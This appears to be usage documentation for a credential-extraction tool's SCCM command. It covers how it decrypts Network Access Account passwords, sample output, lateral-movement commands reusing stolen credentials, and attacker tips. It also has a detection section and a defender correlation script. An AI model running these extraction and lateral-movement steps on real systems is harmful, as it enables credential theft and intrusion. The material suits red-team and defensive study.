Overview

The sccm command extracts and decrypts Microsoft SCCM (System Center Configuration Manager) Network Access Account (NAA) credentials from WMI. When elevated on an SCCM client machine, it retrieves the DPAPI_SYSTEM secret and decrypts the stored NAA credentials.
SCCM Network Access Accounts are domain credentials used by clients to access distribution points. These accounts often have elevated privileges in the environment.

Basic Usage

# Extract and decrypt SCCM NAA credentials (requires elevation)
SharpDPAPI.exe sccm
This command requires elevation (Administrator or SYSTEM privileges) to:
  • Access WMI for SCCM policy data
  • Retrieve the DPAPI_SYSTEM LSA secret
  • Decrypt the Network Access Account credentials

Requirements

1. SCCM Client: the target machine must be an SCCM client with the Configuration Manager client installed.
2. Network Access Account: the SCCM environment must be configured with a Network Access Account.
3. Elevation: must run with Administrator or SYSTEM privileges.

How It Works

1. WMI Query: queries WMI for the SCCM policy containing NAA credential blobs in the root\ccm\Policy\Machine\ActualConfig namespace.
2. DPAPI_SYSTEM Retrieval: elevates to SYSTEM and retrieves the DPAPI_SYSTEM LSA secret.
3. Masterkey Decryption: uses DPAPI_SYSTEM to decrypt the system masterkeys.
4. Credential Decryption: decrypts the Network Access Account credentials using the masterkeys.

What Are SCCM Network Access Accounts?

SCCM Network Access Accounts (NAA) are used by client machines to:
  • Access distribution points for software packages
  • Download OS deployment images
  • Retrieve application content
  • Access task sequences
  • Authenticate to SCCM infrastructure
  • Access management points
  • Communicate with distribution points
  • Download policies and updates
  • OS deployment operations
  • Software distribution
  • Update management
  • Application deployment
NAA credentials are typically domain accounts with access to distribution points and potentially other network resources.

Example Output

[*] Action: SCCM Network Access Account Extraction

[*] Elevating to SYSTEM via token duplication for LSA secret retrieval
[*] RevertToSelf()

[*] Secret  : DPAPI_SYSTEM
[*]    full: DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF6C88CEFD23D0291FA9FE46899D4DE12A180E76C3
[*]    m/u : DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF / 6C88CEFD23D0291FA9FE46899D4DE12A180E76C3

[*] SYSTEM master key cache:

{1e76e1ee-1c53-4350-9a3d-7dec7afd024a}:4E4193B4C4D2F0420E0656B5F83D03754B565A0C

[*] Querying WMI for SCCM Network Access Account...

[+] Network Access Account found:

    Username: DOMAIN\sccm_naa
    Password: P@ssw0rd123!
    Domain  : DOMAIN

Why Target SCCM NAA?

Privileged Access

NAA accounts often have elevated privileges for accessing network resources

Lateral Movement

Credentials work across SCCM infrastructure and distribution points

Persistence

Credentials rarely change and work indefinitely

Wide Deployment

Present on all SCCM client machines in the environment

Common Scenarios

After compromising an SCCM client:
# 1. Verify elevation
whoami /groups | findstr "S-1-5-32-544"

# 2. Extract NAA credentials
SharpDPAPI.exe sccm

# 3. Use credentials for lateral movement
# Credentials can access distribution points, management points, etc.
Discover privileged accounts through SCCM:
# Extract NAA credentials
SharpDPAPI.exe sccm

# Test account privileges
# Often has access to:
# - File shares
# - Distribution points
# - Administrative shares
# - Other SCCM infrastructure
Extract credentials from multiple SCCM clients:
# On each SCCM client machine
SharpDPAPI.exe sccm

# Compile unique NAA credentials
# Multiple sites may use different NAAs

Finding SCCM Clients

Identify SCCM client machines:

Registry Check:
# Check if SCCM client is installed
Get-ItemProperty -Path "HKLM:\Software\Microsoft\SMS\Client\Configuration\Client Properties" -ErrorAction SilentlyContinue

Service Check:
# Check for SCCM client service
Get-Service -Name CcmExec -ErrorAction SilentlyContinue

File System Check:
# Check for SCCM client directory
Test-Path "C:\Windows\CCM"

Active Directory:
# List Windows computers from AD as candidate SCCM clients
# (this does not confirm the client is installed; run the checks above on each host)
Get-ADComputer -Filter * -Properties OperatingSystem |
  Where-Object {$_.OperatingSystem -like "*Windows*"}

SCCM Infrastructure Components

Understanding SCCM infrastructure helps maximize the value of NAA credentials:

Distribution Points:
  • Content storage locations
  • Software package repositories
  • NAA credentials provide access
Management Points:
  • Client communication endpoints
  • Policy distribution
  • Status reporting
Site Servers:
  • Central SCCM administration
  • Database servers
  • May be accessible with NAA credentials

Detection Considerations

SCCM credential extraction is a high-value operation that should trigger security alerts.
Host-Based Indicators:
  • Elevation to SYSTEM privileges
  • LSA secret retrieval (DPAPI_SYSTEM)
  • WMI queries to SCCM namespaces
  • Access to CCM policy data
  • SharpDPAPI.exe process execution
WMI Indicators:
Namespace: root\ccm\Policy\Machine\ActualConfig
Query: SELECT * FROM CCM_NetworkAccessAccount
Event Log Indicators:
Event ID: 4624 (Logon)
Logon Type: 3 (Network)
Account Name: SYSTEM

Event ID: 4656 (Object Access)
Object: LSA Secrets
Process: SharpDPAPI.exe or suspicious process
Defensive Monitoring:
  • Monitor WMI queries to SCCM namespaces
  • Alert on DPAPI_SYSTEM secret access
  • Track SYSTEM privilege elevation
  • Detect SharpDPAPI or similar tool execution
  • Monitor unusual process accessing WMI SCCM data
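As an added defender-side example (not part of the SharpDPAPI documentation), the following Python correlates the WMI and host-based indicators listed above over constructed sample records: a non-CcmExec process querying CCM_NetworkAccessAccount in root\ccm\Policy\Machine\ActualConfig on the same host, and within a few minutes of, an LSA secret access event (4656). The record field names and the 5-minute window are assumptions for a normalised log pipeline, not any product's schema.

```python
"""Correlate constructed host telemetry for SCCM NAA extraction indicators."""
from datetime import datetime, timedelta

# Constructed sample records (not real telemetry). Field names are assumptions
# for a normalised log pipeline, not a specific product's schema.
EVENTS = [
    {"host": "WS01", "ts": "2024-05-01T10:00:01", "kind": "wmi",
     "process": "CcmExec.exe", "namespace": "root\\ccm\\Policy\\Machine\\ActualConfig",
     "query": "SELECT * FROM CCM_NetworkAccessAccount"},
    {"host": "WS02", "ts": "2024-05-01T11:00:00", "kind": "security",
     "event_id": 4656, "object": "LSA Secrets", "process": "SharpDPAPI.exe"},
    {"host": "WS02", "ts": "2024-05-01T11:00:02", "kind": "wmi",
     "process": "SharpDPAPI.exe", "namespace": "root\\ccm\\Policy\\Machine\\ActualConfig",
     "query": "SELECT * FROM CCM_NetworkAccessAccount"},
    {"host": "WS03", "ts": "2024-05-01T12:00:00", "kind": "security",
     "event_id": 4656, "object": "LSA Secrets", "process": "lsass.exe"},
]

CCM_POLICY_NS = "root\\ccm\\policy\\machine\\actualconfig"
LEGIT_WMI_CLIENTS = {"ccmexec.exe"}  # the SCCM agent itself legitimately reads this class


def is_naa_query(ev):
    """WMI read of the NAA policy class by a process other than the SCCM agent."""
    return (ev["kind"] == "wmi"
            and ev["namespace"].lower() == CCM_POLICY_NS
            and "ccm_networkaccessaccount" in ev["query"].lower()
            and ev["process"].lower() not in LEGIT_WMI_CLIENTS)


def is_lsa_secret_access(ev):
    """Event 4656 handle request on an LSA secrets object (DPAPI_SYSTEM lives there)."""
    return ev["kind"] == "security" and ev["event_id"] == 4656 and "lsa" in ev["object"].lower()


def find_naa_extraction(events, window=timedelta(minutes=5)):
    """Return [(host, process)] for hosts showing both indicators inside `window`."""
    queries = [e for e in events if is_naa_query(e)]
    lsa = [e for e in events if is_lsa_secret_access(e)]
    alerts = []
    for q in queries:
        qt = datetime.fromisoformat(q["ts"])
        for s in lsa:
            if s["host"] == q["host"] and abs(datetime.fromisoformat(s["ts"]) - qt) <= window:
                alerts.append((q["host"], q["process"]))
                break  # one alert per suspicious query is enough
    return alerts


if __name__ == "__main__":
    for host, proc in find_naa_extraction(EVENTS):
        print(f"[ALERT] possible SCCM NAA extraction on {host} by {proc}")
```

Only WS02 trips both indicators; WS01 is the agent's own policy read and WS03 has LSA access without the WMI query, so neither is alerted on by this rule.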

Tips

  • Target workstations and servers with SCCM client
  • NAA credentials often work across entire SCCM infrastructure
  • Test NAA credentials against distribution points
  • Check for multiple NAA accounts (different sites)
  • Correlate with SCCM infrastructure mapping
  • Requires elevation (high visibility)
  • SYSTEM privilege elevation generates events
  • WMI queries may be logged
  • LSA secret access triggers alerts
  • Consider timing and frequency of extraction

Troubleshooting

No NAA found:
  • SCCM environment may not be configured with NAA
  • Machine may not be SCCM client
  • NAA may not be cached on this client
  • Check WMI namespace manually
Access denied:
  • Need Administrator privileges
  • UAC may block elevation
  • AV/EDR may prevent SYSTEM elevation
  • Security policy may restrict access
SCCM client not found:
  • Verify SCCM client installation
  • Check CcmExec service status
  • Confirm CCM directory exists
  • Machine may not be managed by SCCM

Manual SCCM NAA Extraction

Alternative PowerShell method:
# Query WMI for NAA policy
$NAA = Get-WmiObject -Namespace "root\ccm\Policy\Machine\ActualConfig" -Class "CCM_NetworkAccessAccount"

# Display encrypted credentials
$NAA.NetworkAccessUsername
$NAA.NetworkAccessPassword

# Note: Password is DPAPI encrypted, requires decryption

SCCM Lateral Movement

After obtaining NAA credentials:
1. Enumerate SCCM Infrastructure

# Find management points
Get-WmiObject -Namespace "root\ccm" -Class "SMS_Authority"

# Find distribution points
Get-WmiObject -Namespace "root\ccm" -Class "SMS_DistributionPoint"

2. Test NAA Access

# Test authentication
net use \\distribution-point\SMS_DP$ /user:DOMAIN\sccm_naa P@ssw0rd123!

3. Access SCCM Shares

# Access distribution points
dir \\distribution-point\SMS_DP$\

# Look for software packages, scripts, sensitive data

Additional Resources

SCCM Security

Learn about SCCM security best practices and hardening Network Access Accounts